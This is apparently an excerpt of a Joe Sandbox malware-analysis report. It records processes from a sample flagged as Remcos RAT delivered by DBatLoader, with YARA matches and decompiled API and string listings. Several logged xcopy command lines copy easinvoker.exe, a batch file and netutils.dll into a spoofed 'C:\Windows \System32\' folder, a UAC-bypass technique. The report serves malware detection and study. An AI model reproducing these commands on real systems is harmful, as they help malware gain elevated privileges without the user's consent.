Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x50000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:40:19
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: xcopy.exePID: 344, Parent PID: 3736

General

Target ID:	18
Start time:	08:40:19
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x50000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:40:19
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: xcopy.exePID: 1308, Parent PID: 3736

General

Target ID:	21
Start time:	08:40:19
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x50000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:40:31
Start date:	24/04/2024
Path:	C:\Users\Public\Libraries\Mywiztwu.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Mywiztwu.PIF"
Imagebase:	0x7ff70f330000
File size:	1'646'592 bytes
MD5 hash:	38310FB63BAD19820D761C97F325896D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000018.00000002.1950636346.00000000023D5000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000018.00000002.1951955264.0000000002A51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:40:39
Start date:	24/04/2024
Path:	C:\Users\Public\Libraries\Mywiztwu.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Mywiztwu.PIF"
Imagebase:	0x400000
File size:	1'646'592 bytes
MD5 hash:	38310FB63BAD19820D761C97F325896D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.2031904948.0000000000704000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000019.00000002.2032787763.00000000028B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.2042016371.000000001447B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.1%
Total number of Nodes:	946
Total number of Limit Nodes:	25

Executed Functions

Function 00007FF683F80A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

_wcsnicmp.MSVCRT ref: 00007FF683F80AFE
memset.MSVCRT ref: 00007FF683F80B37
wcschr.MSVCRT ref: 00007FF683F80B91
wcsrchr.MSVCRT ref: 00007FF683F80C14
wcsrchr.MSVCRT ref: 00007FF683F80D79
NeedCurrentDirectoryForExePathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0 ref: 00007FF683F80D9A
wcsrchr.MSVCRT ref: 00007FF683F80FBB
wcschr.MSVCRT ref: 00007FF683F80FD8
wcschr.MSVCRT ref: 00007FF683F80FF3
_wcsicmp.MSVCRT ref: 00007FF683F81091
_wcsicmp.MSVCRT ref: 00007FF683F810B1
wcsrchr.MSVCRT ref: 00007FF683F81102
_wcsicmp.MSVCRT ref: 00007FF683F81124
_wcsicmp.MSVCRT ref: 00007FF683F81142
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F81169

Strings

PATHEXT, xrefs: 00007FF683F80E6E
.CMD, xrefs: 00007FF683F810A7, 00007FF683F8111A
.BAT, xrefs: 00007FF683F81087, 00007FF683F81138
PATH, xrefs: 00007FF683F811D3
cmd , xrefs: 00007FF683F80AF4
COMSPEC, xrefs: 00007FF683F8D927
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF683F8DA38

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
API String ID: 3305344409-4288247545
Opcode ID: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
Instruction ID: 994a078cca9f29b7d49943c392b4fb95278953f0bb78e2b537fe373c41c4ee11
Opcode Fuzzy Hash: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
Instruction Fuzzy Hash: EC42D621A48682C6EF688B1298122B967A1FF85B94F4C463DED1EE77D5DF3CE445C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

wcschr.MSVCRT ref: 00007FF683F7AAB6
towlower.MSVCRT ref: 00007FF683F7AAD5
memset.MSVCRT ref: 00007FF683F7AC27
wcschr.MSVCRT ref: 00007FF683F7AC3C
wcschr.MSVCRT ref: 00007FF683F7AC60
wcsrchr.MSVCRT ref: 00007FF683F7AC9B
wcschr.MSVCRT ref: 00007FF683F7AD82
wcschr.MSVCRT ref: 00007FF683F7AD9D
wcschr.MSVCRT ref: 00007FF683F7ADB8
wcschr.MSVCRT ref: 00007FF683F7ADD3
wcschr.MSVCRT ref: 00007FF683F7ADEE
wcschr.MSVCRT ref: 00007FF683F7AE09
iswspace.MSVCRT ref: 00007FF683F7AE30

Strings

:, xrefs: 00007FF683F8BC86
:, xrefs: 00007FF683F8BCFE
OFF, xrefs: 00007FF683F8BC32, 00007FF683F8BC92, 00007FF683F8BD0A
:ON, xrefs: 00007FF683F8BD37
:, xrefs: 00007FF683F8BC26

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
String ID: :$:$:$:ON$OFF
API String ID: 4076514806-467788257
Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction ID: 7a056ccde8192de0fa25f23951cccdb4a4e03008a27ca091ef9c4330c67f61e0
Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction Fuzzy Hash: A122A321A09687C6EF589F2699162B966A1FF49B84F4D813DD90EE7794DF3CA840C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F851EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF683F85508: GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF683F76F97), ref: 00007FF683F8550C

GetLocaleInfoW.KERNELBASE ref: 00007FF683F85237
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85260
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F852AB
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F852F7
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85335
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85360
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85388
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F853B0
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F853D8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85400
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85428
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85450
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85478
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F854A0
setlocale.MSVCRT ref: 00007FF683F854BD

Strings

MM/dd/yy, xrefs: 00007FF683F852D0
.OCP, xrefs: 00007FF683F854B4
Wed, xrefs: 00007FF683F8F078
Mon, xrefs: 00007FF683F8EFF2
Fri, xrefs: 00007FF683F8F0FE
Sun, xrefs: 00007FF683F8F184
Tue, xrefs: 00007FF683F8F035
Thu, xrefs: 00007FF683F8F0BB
Sat, xrefs: 00007FF683F8F141
dd/MM/yy, xrefs: 00007FF683F8EFA3
yy/MM/dd, xrefs: 00007FF683F8EF8D

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: InfoLocale$DefaultLangUsersetlocale
String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
API String ID: 2492766124-2236139042
Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction ID: 8fbd8cd9a5153966d78d7411a8054341a0e17c0460043496716ffd83710fb4be
Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction Fuzzy Hash: BAF15065B48742CAEF158F12E5122B966A5FF48B84F98413DCA0DB77A4EF3CE905C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328
threadprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84297
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F842D7
memset.MSVCRT ref: 00007FF683F842FD
memset.MSVCRT ref: 00007FF683F84368
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84380

Part of subcall function 00007FF683F83A90: wcsrchr.MSVCRT ref: 00007FF683F83ADF
Part of subcall function 00007FF683F83A90: _wcsnicmp.MSVCRT ref: 00007FF683F83B38

wcsrchr.MSVCRT ref: 00007FF683F843E6
lstrcmpW.KERNELBASE ref: 00007FF683F84401
CreateProcessW.KERNELBASE ref: 00007FF683F8447F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F844AA
CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F845EE
_local_unwind.MSVCRT ref: 00007FF683F84644
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F847E1
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84802
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8ECD4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8ECF0
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F8ED12

Strings

%01C, xrefs: 00007FF683F847B1
=ExitCode, xrefs: 00007FF683F8454C
COPYCMD, xrefs: 00007FF683F8439C, 00007FF683F844B9
%08X, xrefs: 00007FF683F8452C
=ExitCodeAscii, xrefs: 00007FF683F8456B
h, xrefs: 00007FF683F8436D
\XCOPY.EXE, xrefs: 00007FF683F843F7

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
API String ID: 388421343-2905461000
Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
Instruction ID: f7d4f13caf55a479f64812f019dcc03edeacdcb11d8d8a48dec91d7b9278c357
Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
Instruction Fuzzy Hash: C0F14E32A48B82C5EA64DF12E4427BAB7A4FF89784F48413AD94DA7754DF3CE445CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF683F84E35), ref: 00007FF683F855DA
RegQueryValueExW.KERNELBASE ref: 00007FF683F85623
RegQueryValueExW.KERNELBASE ref: 00007FF683F85667
RegQueryValueExW.KERNELBASE ref: 00007FF683F856BE
RegQueryValueExW.KERNELBASE ref: 00007FF683F85702
RegQueryValueExW.KERNELBASE ref: 00007FF683F85759
RegQueryValueExW.KERNELBASE ref: 00007FF683F857CF
RegQueryValueExW.KERNELBASE ref: 00007FF683F85862
RegCloseKey.KERNELBASE ref: 00007FF683F8587B
time.MSVCRT ref: 00007FF683F85896
srand.MSVCRT ref: 00007FF683F858A5

Strings

EnableExtensions, xrefs: 00007FF683F85660
DisableUNCCheck, xrefs: 00007FF683F85614
AutoRun, xrefs: 00007FF683F8585B
CompletionChar, xrefs: 00007FF683F85752
PathCompletionChar, xrefs: 00007FF683F857C8
DefaultColor, xrefs: 00007FF683F856FB
DelayedExpansion, xrefs: 00007FF683F856B7
Software\Microsoft\Command Processor, xrefs: 00007FF683F855D3

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction ID: 441308f4a1fb0c4bb5ee4586d15a5d14ea7938de834815cc19245894fa3a6626
Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction Fuzzy Hash: 69E1913262DA82C7EB608F11F45157AB7A0FF88744F48513AEA8EA3A54DF7CD544CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84D9A

Part of subcall function 00007FF683F858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF683F9C6DB), ref: 00007FF683F858EF

SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84DBB
_get_osfhandle.MSVCRT ref: 00007FF683F84DCA
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84DE0
_get_osfhandle.MSVCRT ref: 00007FF683F84DEE
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84E04

Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F80589
Part of subcall function 00007FF683F80580: SetConsoleMode.KERNELBASE ref: 00007FF683F8059E
Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F805AF
Part of subcall function 00007FF683F80580: GetConsoleMode.KERNELBASE ref: 00007FF683F805C5
Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F805EF
Part of subcall function 00007FF683F80580: GetConsoleMode.KERNELBASE ref: 00007FF683F80605
Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F80632
Part of subcall function 00007FF683F80580: SetConsoleMode.KERNELBASE ref: 00007FF683F80647

Part of subcall function 00007FF683F84A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A28
Part of subcall function 00007FF683F84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A66
Part of subcall function 00007FF683F84A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A7D
Part of subcall function 00007FF683F84A14: memmove.MSVCRT(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A9A
Part of subcall function 00007FF683F84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84AA2

Part of subcall function 00007FF683F84AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F78798), ref: 00007FF683F84AD6
Part of subcall function 00007FF683F84AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F78798), ref: 00007FF683F84AEF

Part of subcall function 00007FF683F85554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF683F84E35), ref: 00007FF683F855DA
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F85623
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F85667
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F856BE
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F85702

GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84E35
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84E81
GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84F69
GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84F95
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FB0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FC1
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FD8
GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FF8
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F85037
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F8504B
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F850DF
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F850F2
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F8510F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F85130
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F8514A
free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F85175

Part of subcall function 00007FF683F83578: _get_osfhandle.MSVCRT ref: 00007FF683F83584
Part of subcall function 00007FF683F83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F8359C
Part of subcall function 00007FF683F83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835C3
Part of subcall function 00007FF683F83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835D9
Part of subcall function 00007FF683F83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835ED
Part of subcall function 00007FF683F83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F83602

Strings

